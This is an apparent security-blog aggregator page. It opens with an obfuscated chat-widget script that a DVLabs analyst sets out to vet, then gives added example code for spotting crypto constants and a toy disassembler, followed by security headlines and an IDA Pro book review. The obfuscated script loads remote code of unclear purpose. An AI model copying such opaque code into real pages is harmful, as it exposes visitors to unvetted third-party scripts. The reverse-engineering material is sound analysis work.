(1<<this.cb)-1;for(var i=0;i<cg.length*this.cb;i+=this.cb)aX[i>>5]
|=(cg.charCodeAt(i/this.cb)&av)<<(32-this.cb-i%32);return 
aX;},ah:function(bD){var 
bj=this.ar?"0123456789ABCDEF":"0123456789abcdef";var cg="";for(var 
i=0;i<bD.length*4;i++){cg+=bj.charAt((bD[i>>2]>>((3-i%4)*8+4))&0xF)
+bj.charAt((bD[i>>2]>>((3-i%4)*8))&0xF);}return cg;}};if(typeof 
S_WC=='undefined')S_WC={};if(typeof $=='undefined')$=function(id)
{return document.getElementById(id)};if(typeof $C=='undefined')
$C=function(t){return document.createElement(t)};if(typeof 
$S=='undefined')$S={};S_WC.EmbedConf={bA:false,cj:
{bZ:'sml_emb_testing',bP:'http://image2.sina.com.cn/woocall/cli/',aS
:'.swf',bz:'woocall_swf_file',bK:'S_WC_EMBED_BOX',bL:400,bJ:300,l:10
,g:true},cd:false,T:'_SP',I:false,D:'_CL',aU:'http://image2.sina.com
.cn/ent/woocall/Theme/',K:36,A:14,f:'_CtrlBtn',C:'_ChatBox',bx:'S_WC
',aQ:14,aW:'_USRTOK',S:6,aV:0,P:'9icn4po62xa2nbcd',bv:0,F:'/cgi-
bin/s_wc_corev3?v=m&t=1'};if(typeof Util=='undefined')Util=
{};Util.bk=(navigator.appName.indexOf("Microsoft",0)!=-1)?
true:false;Util.aD=function(aM,an){var 
bd="ABCDEFGHIJKLMNOPQRSTUVWXTZabcdefghiklmnopqrstuvwxyz";var 
bf=bd+"0123456789";var bG='';for(var i=0;i<aM;i++){var 
bW=Math.floor(Math.random()*bf.length);if(an&&i==0)bG+=bd.substring
(bW,bW+1);else bG+=bf.substring(bW,bW+1);}return 
bG;};Util.aG=function(name,value,expires,bn,domain,aE){var 
al=name+"="+escape(value)+((expires)?"; 
expires="+expires.toGMTString():"")+((bn)?"; bn="+bn:"")+
((domain)?"; domain="+domain:"")+((aE)?"; 
aE":"");document.cookie=al;};Util.ao=function(name){var 
bT=document.cookie;var prefix=name+"=";var ca=bT.indexOf("; 
"+prefix);if(ca==-1){ca=bT.indexOf(prefix);if(ca!=0)return null;}
else ca+=2;var bE=document.cookie.indexOf(";",ca);if(bE==-1)
bE=bT.length;return unescape(bT.substring
(ca+prefix.length,bE));};function LdCfg(bu){if(typeof 
SINA_WOOCALL_CONFIG!='undefined'){if
(SINA_WOOCALL_CONFIG.StandPoint&&SINA_WOOCALL_CONFIG.StandPoint.L&&S
INA_WOOCALL_CONFIG.StandPoint.R){bu.cd=
{L:SINA_WOOCALL_CONFIG.StandPoint.L,M:SINA_WOOCALL_CONFIG.StandPoint
.M?SINA_WOOCALL_CONFIG.StandPoint.M:false,R:SINA_WOOCALL_CONFIG.StandPo
int.R}}if(SINA_WOOCALL_CONFIG.CustomURL)
{bu.aP=SINA_WOOCALL_CONFIG.CustomURL;}if(SINA_WOOCALL_CONFIG.Conn)
{bu.bv=1;}}};function LdBoxCfg(){if(typeof SINA_WOOCALL_CONFIG!
='undefined'){if
(SINA_WOOCALL_CONFIG.EmbedBox&&SINA_WOOCALL_CONFIG.EmbedBox.MyId&&SI
NA_WOOCALL_CONFIG.EmbedBox.MyWidth&&SINA_WOOCALL_CONFIG.EmbedBox.MyH
eight){var B=
{N:SINA_WOOCALL_CONFIG.EmbedBox.MyId,V:SINA_WOOCALL_CONFIG.EmbedBox.
MyWidth,J:SINA_WOOCALL_CONFIG.EmbedBox.MyHeight};return B}else 
return false;}return false;};function woocall_swf_file_DoFSCommand
(ai,bC){switch(ai){case 'InitApp':S_WC.EmbedUI.Q(bC);break;}};if
(Util.bk){document.write('<SCRIPT event=FSCommand(ai,bC) 
for='+S_WC.EmbedConf.cj.bz+'>');document.write
('woocall_swf_file_DoFSCommand(ai, bC);');document.write
('</SCRIPT>');}S_WC.EmbedUI=function(){this.Init.apply
(this,arguments);};S_WC.EmbedUI.Q=function(bC){var s=$C
('script');s.src='http://'+bC+S_WC.EmbedConf.F;s.type='text/javascri
pt';document.body.appendChild(s);};S_WC.EmbedUI.prototype=
{cl:null,df:null,bR:null,aZ:null,ba:true,Init:function(cl)
{this.cl=cl;if(this.cl.bA)
this.cl.cj.bP=this.cl.cj.bP+this.cl.bA+'/';this.bX=true;this.aZ=this
.cl.bx;this.df=this.ac();this.ba=Util.bk;},H:function(){this.bb
();this.ae();this.af();},aF:function(bK,bL,bJ)
{this.cl.cj.bK=bK;this.cl.cj.bL=bL;this.cl.cj.bJ=bJ;},aH:function
(n,be){if(typeof be=='string'){this.cl.aU=be;}var 
ci=this.cl.aU+n+'/';this.cl.aT=
{U:ci+'boxlogo.gif',G:ci+"wc_style_embed.css"};},ap:function(){if(!
this.bR||this.bR.length==0){this.bb();}return this.bR;},af:function
(){var width=this.cl.cj.bL;var 
height=this.cl.cj.bJ;this.Y.style.width=width+'px';this.W.style.widt
h=width+'px';this.aY.style.height=(height-this.cl.K-this.cl.A)
+"px";this.aY.style.width=width+'px';this.X.style.width=width+'px';}
,ae:function(){this.aa();var cj=$C('div');var bN=$C('div');var m=$C
('div');var bw=$C('div');var bt=$C
('div');$(this.cl.cj.bK).appendChild
(cj);cj.className=this.aZ+this.cl.C;cj.appendChild
(bN);cj.appendChild(bw);cj.appendChild(bt);bN.className='Hnd';var 
bO=document.title;if(bO.length>this.cl.aQ){bO=bO.substr
(0,this.cl.aQ)+'..';}var O='<img align="absmiddle" 
src="'+this.cl.aT.U+'" /> '+bO;var aN='<div 
class="Title">'+O+'</div>';bN.innerHTML=aN;bt.className='Bottom';bw.
innerHTML=this.ap
();this.X=cj;this.Y=bN;this.aY=bw;this.W=bt;},aa:function(){bV=$C
("link");bV.rel="stylesheet";bV.type="text/css";bV.href=this.cl.aT.G
;var head=document.getElementsByTagName("head")[0];head.appendChild
(bV);},ac:function(){var bM='';if(this.cl.df&&this.bX)
{bM=this.cl.df;}else if(this.cl.aP&&this.bX){var bI=new 
Util.by;bM=bI.bi
(this.cl.aP);this.eF=window.location.href;this.eF=this.eF.replace
("&","|");}else
{this.eF=window.location.href;this.eF=this.eF.replace("&","|");if
(this.cl.aV>0){this.eF=this.eF.substr(0,this.cl.aV);}var bI=new 
Util.by;bM=bI.bi(this.eF);}return bM;},ad:function(){var 
ci=window.location.href;var p=ci.indexOf('/',7);var domain='';if(p!
=-1){domain=ci.substr(0,p);}else domain=ci;return 
domain;},ab:function(){var bF=new Date();bF.setTime(bF.getTime()
+365*24*60*60*1000*50);var bQ=Util.ao(this.cl.bx+this.cl.aW);if(!
bQ){bQ=Util.aD(this.cl.S,true);Util.aG
(this.cl.bx+this.cl.aW,bQ,bF,'/');}return bQ;},bc:function(ck){if
(this.cl.cd&&this.bX){ck.push('&position1=');ck.push
(this.cl.cd.L);if(this.cl.cd.M){ck.push('&position=');ck.push
(this.cl.cd.M);}ck.push('&position0=');ck.push
(this.cl.cd.R);}},bb:function(){var ef=this.ab();var ck=Array();var
 domain=this.ad();if(this.cl.cd)
{this.cl.cj.bZ=this.cl.cj.bZ+this.cl.T;}if(this.cl.I)
{this.cl.cj.bZ=this.cl.cj.bZ+this.cl.D;}if(this.ba){ck.push('<object 
classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" 
codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/
swflash.cab#version=7,0,0,0" width="');ck.push("100%");ck.push('"
 height="');ck.push("100%");ck.push('" id="');ck.push
(this.cl.cj.bz);ck.push('" align="middle"><param 
name="allowScriptAccess" value="always" />');ck.push('<param 
name="movie" value="');ck.push
(this.cl.cj.bP+this.cl.cj.bZ+this.cl.cj.aS);ck.push('?
ChName=');ck.push(this.df);ck.push('&UsrTok=');ck.push(ef);ck.push
('&Domain=');ck.push(domain);ck.push('&PgURL=');ck.push(escape
(this.eF));ck.push('&isDirect=');ck.push(this.cl.bv);this.bc
(ck);ck.push('" />');ck.push('<param name="quality" value="high" 
/><param name="bgcolor" value="#ffffff" />');ck.push('</object>');}
else{ck.push('<embed src="');ck.push
(this.cl.cj.bP+this.cl.cj.bZ+this.cl.cj.aS);ck.push('" 
FlashVars="');ck.push('ChName=');ck.push(this.df);ck.push
('&UsrTok=');ck.push(ef);ck.push('&Domain=');ck.push(domain);ck.
push('&PgURL=');ck.push(escape(this.eF));ck.push
('&isDirect=');ck.push(this.cl.bv);this.bc(ck);ck.push('" 
quality="high" bgcolor="#ffffff" width="');ck.push("100%");ck.push
('" height="');ck.push("100%");ck.push('" name="');ck.push
(this.cl.cj.bz);ck.push('" align="middle" allowScriptAccess="always"
 swLiveConnect="true" type="application/x-shockwave-flash" 
pluginspage="http://www.macromedia.com/go/getflashplayer" />');}
this.bR=ck.join('');}};function S_WC_EMBED_Creese()
{S_WC.EmbedConf.bA='0_2_REV3';LdCfg(S_WC.EmbedConf);var bB=new 
S_WC.EmbedUI(S_WC.EmbedConf);bB.aH('Grey2');var bS=LdBoxCfg();if
(bS){bB.aF(bS.N,bS.V,bS.J);bB.H();}};S_WC_EMBED_Creese(); 

Lots of interesting tricks going on here. This software seems to be a P2P chat program that lets you chat with people who are currently viewing the same web page as you are. I found it used on the Super Girl TV show website. It seems rather innocent, but until you understand exactly what the above code does, would you use it? Is it merely obfuscation? These are the types of questions that filter writers at DVLabs have to answer on a case-by-case basis, and questions that I'll be spending some time on for the above example. So, back to work!
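The script above carries numeric constants that identify standard algorithms: 0x9E3779B9 is the delta of the TEA cipher family, and 1732584193, -271733879, 1518500249 and their companions are the initial state and round constants of SHA-1. The scanner below, an added example rather than DVLabs code, looks for such constants in a constructed fragment of the same shape, which is the usual first step in telling renamed standard crypto from bespoke obfuscation.

```javascript
// Added example, not DVLabs code: identify standard algorithms in a script by
// the magic constants they cannot avoid carrying. The scanner normalises every
// integer literal to an unsigned 32-bit word, so -271733879 and 0xEFCDAB89
// are the same constant, then matches against a small table.

const KNOWN_CONSTANTS = [
  [0x9e3779b9, 'TEA/XTEA/XXTEA delta'],
  [0x67452301, 'MD5/SHA-1 initial state H0'],
  [0xefcdab89, 'MD5/SHA-1 initial state H1'],
  [0x98badcfe, 'MD5/SHA-1 initial state H2'],
  [0x10325476, 'MD5/SHA-1 initial state H3'],
  [0xc3d2e1f0, 'SHA-1 initial state H4'],
  [0x5a827999, 'SHA-1 round constant K0'],
  [0x6ed9eba1, 'SHA-1 round constant K1'],
  [0x8f1bbcdc, 'SHA-1 round constant K2'],
  [0xca62c1d6, 'SHA-1 round constant K3'],
];

// Collect every decimal or hex integer literal that fits in 32 bits. A minus
// sign directly before a literal is treated as its sign, which is how the
// obfuscated SHA-1 above writes its negative initial values.
function extractConstants(code) {
  const re = /(-?)\b(0x[0-9a-f]+|\d+)\b/gi;
  const found = new Set();
  let m;
  while ((m = re.exec(code)) !== null) {
    const text = m[2].toLowerCase();
    let v = text.startsWith('0x') ? parseInt(text, 16) : parseInt(text, 10);
    if (m[1] === '-') v = -v;
    if (v >= 0x100000000 || v < -0x80000000) continue; // not a 32-bit word
    found.add(v >>> 0);
  }
  return found;
}

// Report matched constants and which algorithm families they point to. SHA-1
// needs a strong majority of its nine constants; the four shared with MD5 on
// their own only say "an MD5 or SHA-1 state block".
function identifyAlgorithms(code) {
  const found = extractConstants(code);
  const hits = KNOWN_CONSTANTS
    .filter(([c]) => found.has(c))
    .map(([c, name]) => ({ constant: '0x' + c.toString(16), name }));
  const families = [];
  if (hits.some((h) => h.name.startsWith('TEA'))) families.push('TEA family');
  const sha1Hits = hits.filter((h) => h.name.includes('SHA-1')).length;
  if (sha1Hits >= 6) families.push('SHA-1');
  else if (sha1Hits > 0) families.push('MD5 or SHA-1 (partial)');
  return { hits, families };
}

// Constructed fragment carrying the same constants as the sample above.
const SAMPLE_SCRIPT =
  'var bh=0x9E3779B9;var a=1732584193;var b=-271733879;var c=-1732584194;' +
  'var d=271733878;var e=-1009589776;' +
  'aJ=function(t){return(t<20)?1518500249:(t<40)?1859775393:(t<60)?-1894007588:-899497514;};';

if (typeof require !== 'undefined' && require.main === module) {
  console.log(identifyAlgorithms(SAMPLE_SCRIPT));
}
```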


Cross-site hacks and the art of self defence - WebApp - CGISecurity.com


A British Bank Bans a Man's Password - Blogs - Schneier On Security

Weird story. Mr Jetley said he first realised his security password had been changed when a call centre staff member told him his code word did not match with the one on the computer. "I thought it was actually quite a funny response," he said. "But what really incensed me was when I was told I could not change it...


Redhat/Fedora Servers compromised, package signing key stolen, rogue packages possibly signed - WebApp - CGISecurity.com


Whitepaper: Bypassing ASP .NET "ValidateRequest" for Script Injection Attacks - WebApp - CGISecurity.com


Border Gateway Protocol (BGP) Attacks - Blogs - Schneier On Security

This is serious stuff. (Kim Zetter's posts on the topic are excellent; read them.) It's a man-in-the-middle attack. "The Internet's Biggest Security Hole" (the title of that first link) has been that interior relays have always been trusted even though they are not trustworthy....


ISR-evilgrade - Inject Updates to Exploit Software - Blogs - Darknet

ISR-evilgrade is a modular framework that allows us to take advantage of poor upgrade implementations by injecting fake updates and exploiting the system or software. How does it work? It works with modules; each module implements the structure needed to emulate a false update of a specific application/system. Evilgrade needs the manipulation of...

Read the full post at darknet.org.uk


August 28, 2008

MindshaRE: The IDA Pro Book - Research - DVLabs

Posted by Cody Pierce
IDA can be a very intimidating program to use. When starting out, not only are you trying to get comfortable with assembly, but you also must navigate a program with a steep learning curve. IDA's lack of documentation, aside from ida.hlp, compounds this problem, leaving you somewhat insecure in your endeavor. Not anymore. A new book has been published by No Starch Press titled "The IDA Pro Book". Its author, Chris Eagle, is no stranger to the world of reverse engineering and has been a fixture at security conferences for several years. So today we will take a look at this book. If you are strapped for time and cannot read everything I have to say, I'll summarize this post: Buy this book!

MindshaRE is our weekly look at some simple reverse engineering tips and tricks. The goal is to keep things small and discuss every day aspects of reversing. You can view previous entries here by going through our blog history.



The IDA Pro Book is not the only book on IDA. In fact, another book on using IDA was released earlier this year. I have looked at both of them, and honestly, there is only one book on IDA Pro. Chris Eagle funnels his knowledge of IDA and reversing into a concise, easily readable, and handy "missing manual" for IDA Pro users old and new. His chapters are well defined, and examples are elaborately detailed. Chris' time as an educator in the field of computer science, security, and reverse engineering really shows throughout this book.

Part I of the book starts off by giving the reader a good baseline of tools and idioms as they pertain to reverse engineering. In the first chapter Eagle covers the "Whats, Whys, and Hows", providing a good understanding of what exactly IDA is /doing/ when disassembling a binary. Of particular interest is the section covering different methods of disassembling a binary, such as linear sweep and recursive descent. It's important to have this understanding of the method IDA employs to identify code, data, and primitives.
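To make the linear sweep versus recursive descent distinction concrete, here is an added Python example (not code from the book, from DVLabs, or from IDA). It defines a small constructed toy instruction set and a constructed sample program in which an unconditional jump skips two bytes of inline data; linear sweep decodes straight through the data and falls out of alignment, while recursive descent follows control flow and leaves the data bytes unexplored. The opcode table, byte encoding, and sample bytes are all assumptions for illustration.

```python
"""Toy disassembler contrasting linear sweep and recursive descent."""
from typing import Dict, List, Tuple

# Constructed toy instruction set (not a real architecture):
# opcode -> (mnemonic, length in bytes, control-flow kind)
OPCODES = {
    0x00: ("NOP", 1, "seq"),    # sequential, falls through
    0x01: ("JMP", 2, "jump"),   # unconditional rel8 jump, no fall-through
    0x02: ("JZ", 2, "cjump"),   # conditional rel8 jump plus fall-through
    0x03: ("RET", 1, "stop"),   # ends the flow
    0x04: ("MOV", 2, "seq"),    # MOV imm8
    0x05: ("CALL", 2, "call"),  # rel8 call target, then fall-through
}


def decode(code: bytes, addr: int) -> Tuple[str, int, List[int]]:
    """Decode one instruction at addr; return (text, length, successor addresses).

    Unknown or truncated bytes decode as a 1-byte 'db' that falls through.
    """
    op = code[addr]
    if op not in OPCODES or addr + OPCODES[op][1] > len(code):
        return f"db 0x{op:02X}", 1, [addr + 1] if addr + 1 < len(code) else []
    mnem, length, kind = OPCODES[op]
    nxt = addr + length
    target = None
    if length == 1:
        text = mnem
    elif kind == "seq":
        text = f"{mnem} 0x{code[addr + 1]:02X}"
    else:
        imm = code[addr + 1]
        rel = imm - 256 if imm >= 128 else imm   # signed rel8 displacement
        target = nxt + rel
        text = f"{mnem} 0x{target:02X}"
    if kind == "stop":
        succ: List[int] = []
    elif kind == "jump":
        succ = [target]
    elif kind in ("cjump", "call"):
        succ = [nxt, target]
    else:
        succ = [nxt]
    return text, length, [s for s in succ if 0 <= s < len(code)]


def linear_sweep(code: bytes) -> Dict[int, str]:
    """Decode from the first byte to the last; each instruction starts where the previous ended."""
    listing: Dict[int, str] = {}
    addr = 0
    while addr < len(code):
        text, length, _ = decode(code, addr)
        listing[addr] = text
        addr += length
    return listing


def recursive_descent(code: bytes, entry: int = 0) -> Dict[int, str]:
    """Decode only bytes reachable by following control flow from entry."""
    listing: Dict[int, str] = {}
    worklist = [entry]
    while worklist:
        addr = worklist.pop()
        if addr in listing:
            continue
        text, _, succ = decode(code, addr)
        listing[addr] = text
        worklist.extend(succ)
    return listing


# Constructed sample program: a JMP hops over two bytes of inline data.
SAMPLE = bytes([
    0x04, 0x2A,  # 0x00: MOV 0x2A
    0x01, 0x02,  # 0x02: JMP 0x06 (skips the two data bytes below)
    0xFF, 0x04,  # 0x04: inline data, never executed
    0x02, 0x01,  # 0x06: JZ 0x09
    0x00,        # 0x08: NOP
    0x03,        # 0x09: RET
])


def missed_by_sweep(code: bytes) -> List[int]:
    """Real instruction starts that linear sweep never lands on."""
    sweep = linear_sweep(code)
    return sorted(a for a in recursive_descent(code) if a not in sweep)


if __name__ == "__main__":
    for name, fn in (("linear sweep", linear_sweep), ("recursive descent", recursive_descent)):
        print(f"--- {name} ---")
        for addr, text in sorted(fn(SAMPLE).items()):
            print(f"{addr:04X}: {text}")
    print("missed by sweep:", missed_by_sweep(SAMPLE))
```

On this input the sweep decodes the stray 0x04 data byte at 0x05 as a MOV that swallows the real JZ opcode at 0x06, so it reports instructions at 0x05 and 0x07 that never execute and misses the genuine ones at 0x06 and 0x08; recursive descent never visits 0x04 or 0x05 at all, which is exactly why IDA leaves such bytes undefined until you tell it otherwise.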

Chapter two is necessary for any reverse engineering book, covering commonly used tools outside of IDA Pro. While I understand that mentioning tools such as objdump, strings, PEiD, etc. is necessary, this chapter is my least favorite. It seems inserted merely for posterity's sake, which isn't a terrible thing.

The last chapter rounds out a good intro, by providing the reader with an understanding of the program. It may seem obvious, but issues such as purchasing, support, and installation are at your fingertips. One paragraph titled "Hex-Rays Stance on Piracy" made me chuckle a bit. Regular IDA users will be familiar with the lengths Hex-Rays has gone to not only protect their product, but publicly decry users of pirated copies in their "Hall of Shame".

From the beginning the reader is exposed to my favorite aspect of this book. It is almost 100% IDA from cover to cover. Other books on IDA cover useful, but misguided, topics such as executable file formats, or assembly and higher level programming languages. Obviously this is required knowledge, but there are plenty of dedicated books in each of these areas. From the gates The IDA Pro Book is non stop IDA, only touching on the aforementioned topics when needed to explain a particular subject. It feels like you are really immersed in the program, learning all of its nuances.

Part II of the book jumps right into the meat and potatoes. Chris gets you started by covering the loading of files, how IDA stores its disassembly, navigation, manipulation, and data types. At over 150 pages this section should be studied and memorized by anyone who uses IDA on a regular basis.

Chapters 4 through 6 get the reader's feet wet in the program's UI. The UI is, in my opinion, the source of frustration for most new users of IDA. Eagle himself states in Chapter 3 "IDA is not your mother's word processor" because, while it may look like a text processor, the UI is in a world of its own.

Of particular interest in these chapters are the sections covering IDA's database creation, common and tertiary windows in the UI, and disassembly navigation. It's nice to see all of the UI elements available to the user described in detail in these chapters. Many of the essential windows aren't as noticeable in IDA at first glance and this provides a good reference when ida.hlp is lacking.

Chapters 7 through 10 round out this essential section of the book. One of the highlights, and must reads, is Chris' 40 page coverage of data types and structures. Everything from creating structures, to how C++ classes look in assembly, is laid out in an easy to understand, example driven, manner that is a delightful read. This could be the premier set of chapters of its kind, and certainly one of the best in the book.

Part III takes us through some of the advanced features IDA provides. Configuration customization, and IDA's FLIRT signatures are covered followed by some of IDA's limitations (Generating EXEs anyone?).

Part IV of the book really shines. Its goal is to familiarize the reader with extending IDA. Of all things IDA can do, I believe its scripting, plugin architecture, loader, and processor modules are what separate it from other disassemblers and truly make it the industry standard.

Chris Eagle has a lot of experience in this field, having written many plugins, scripts, and processor modules. This is apparent throughout this part of the book and really helps when covering these complex, and almost undocumented, aspects of IDA. While IDA's scripting language and SDK are not perfect, with the knowledge and help this section provides, a user can apply this to achieve an endless amount of tasks.

While certainly useful, this advanced section may not be for everyone. If you are wanting to just disassemble binaries, and navigate code, you can skip "Extending IDA's Capabilities". But for users wanting to load exotic executable formats, or write a processor module to disassemble a virtual machine this section will be a good resource. I personally got a lot of use out of the loader and processor module chapters. The example driven teaching of these subjects is a welcome detour from the dry documentation, or sparse text files on the web.

Towards the end of the book, in Part V, Chris Eagle shows us how the previous subjects are applied in the real world. Each chapter lightly touches on its respective subject (there are whole books on vulnerability analysis) and provides a good jumping off point for readers interested in that particular application of reverse engineering in IDA Pro. Once again this book stays focused on IDA, and doesn't distract the reader. Although there may be plenty of information on subjects such as vulnerability analysis, and obfuscated code analysis, "Real World Applications" still provides value by delivering useful scripts, and information that can be leveraged by IDA.

Finally we end things with the often maligned subject of IDA's built in debugger. Honestly it gets a bad rap, and it may be a deserved one when compared to fully functional debuggers like WinDbg. However the debugger is not IDA's primary function. It is another extension of the program allowing the user to take their static disassembly work into the world of live analysis.

Eagle does a fine job demonstrating the usefulness of the built in debugger and the features it exposes. From scripting breakpoints, and pulling registers, to handling exceptions, it's all here. Honestly, I may force myself to use it the next time I need a debugger and I'm feeling adventurous.

Chris Eagle delivers a very concise, well laid out book in "The IDA Pro Book". The step by step examples, and much needed detail of all aspects of IDA, alone make this book a good choice. Combine that with the little things such as the numbering system in the examples, must have plugins and tools, side bar tidbits of related information, and well formulated descriptions of seemingly awkward tasks, and this book is a solid addition to any tech library. I honestly think, like IDA, it will be the industry standard on one of the more intimidating applications in the security, and reverse engineering world.

I know what you may be thinking, "Who is Cody, and why should I care about his wordy review?". To answer that I will leave you with two other opinions of the book.

"I wholeheartedly recommend The IDA Pro Book to all IDA Pro users" - Ilfak Guilfanov
"This is the densest, most accurate, and, by far, the best IDA Pro book ever released" - Pierre Vandevenne

For those that don't know Ilfak is the creator of IDA Pro, and Pierre is the Owner/CEO of DataRescue (Former publishers of IDA). If that's not enough, here is a blog post from Ilfak himself.

http://hexblog.com/2008/08/the_ida_pro_book.html

Hope you enjoyed this week's MindshaRE!

-Cody


Chinese hacker malware infects International Space Station? - Blogs - The Dark Visitor

Breaking news is that the International Space Station has been infected by the W32.Gammima.AG trojan. The trojan is also referred to as the kavo.exe virus and is designed to gather information on ten online games:

ZhengTu
Wanmi Shijie or Perfect World
Dekaron Siwan Mojie
HuangYi Online
Rexue Jianghu
ROHAN
Seal Online
Maple Story
R2 (Reign of Revolution)
Talesweaver

Not familiar with all the games but most are Chinese or Korean. Chinese hackers specialize in stealing online gaming information. Symantec also offers up this bit in its writeup:

The worm ends the Matrix Password process if it finds a dialog box with the following characteristics:
Title: MatrixPasswordDlg
Message: Warning! (In Chinese characters)

Will check more into the origin of this malware later today but all indicators suggest that it could be Chinese.



Webcam Hacker Jailed for 4 Years for Spying on Teenager - Blogs - Darknet

Another one bites the dust, this time for spying on a teenage girl via webcam. 4 years is a reasonable sentence this time I think as the case borders on many offenses such as blackmail, indecent behaviour, infringement of privacy, unlawful access and probably a few more. It was a pretty simple hack as it goes, [...]

Read the full post at darknet.org.uk


Blue Box #82: Asterisk & Skype security vulnerabilities, new VoIP security tools, VoIP steganography, VoIP security news and much, much more... - Podcasts - Blue Box

Synopsis:  Blue Box #82: Asterisk & Skype security vulnerabilities, new VoIP security tools, VoIP steganography, VoIP security news and much, much more...


Welcome to Blue Box: The VoIP Security Podcast #82, a 47-minute podcast  from Dan York and Jonathan Zar covering VoIP security news, comments and opinions.  &